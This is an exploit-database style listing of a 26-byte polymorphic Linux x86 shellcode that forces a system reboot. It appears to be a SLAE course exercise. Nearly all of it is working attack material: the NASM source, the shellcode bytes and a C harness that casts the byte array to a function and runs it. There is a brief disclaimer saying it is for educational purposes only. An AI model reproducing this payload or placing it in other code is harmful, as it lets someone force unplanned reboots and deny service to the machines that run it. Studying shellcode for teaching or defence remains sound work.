Linux/x86 reboot polymorphic shellcode (26 bytes) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2020-03-23 | Type : shellcode | Platform : linux_x86
This exploit / vulnerability Linux/x86 reboot polymorphic shellcode (26 bytes) is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

# Exploit Title: Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)
# Purpose: This is a x86 Linux null-free polymorphic shellcode for forcing a reboot.
# Date: 2020-03-23
# Author: Upayan a.k.a. slaeryan
# Contact: upayansaha@icloud.com
# SLAE: 1525
# Vendor Homepage: None
# Software Link: None
# Tested on: Linux x86
# CVE: N/A


/*
; Filename: reboot_polymorphic.nasm
; Author: Upayan a.k.a. slaeryan
; SLAE: 1525
; Contact: upayansaha@icloud.com
; Purpose: This is a x86 Linux null-free polymorphic shellcode for forcing a reboot.
; Testing: ./reboot_polymorphic
; Compile with: ./compile.sh reboot_polymorphic
; Size of shellcode: 26 bytes

global _start

section .text
_start:
xor eax, eax ; Clearing the EAX register
xor ebx, ebx ; Clearing the EBX register
xor ecx, ecx ; Clearing the ECX register
cdq ; Clearing the EDX register
mov al, 0x58 ; Loading syscall value = 0x58 for reboot in AL
mov ebx, 0xfee1dead ; Loading magic 1 in EBX
mov ecx, 672274793 ; Loading magic 2 in ECX
mov edx, 0x1234567 ; Loading cmd val = LINUX_REBOOT_CMD_RESTART in EDX
int 0x80 ; Executing the reboot syscall

*/


#include <stdio.h>
#include <string.h>

unsigned char code[] = \
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\x58\xbb\xad\xde\xe1\xfe\xb9\x69\x19\x12\x28\xba\x67\x45\x23\x01\xcd\x80";

void main()
{

printf("Shellcode Length: %d\n", strlen(code));

int (*ret)() = (int(*)())code;

ret();

}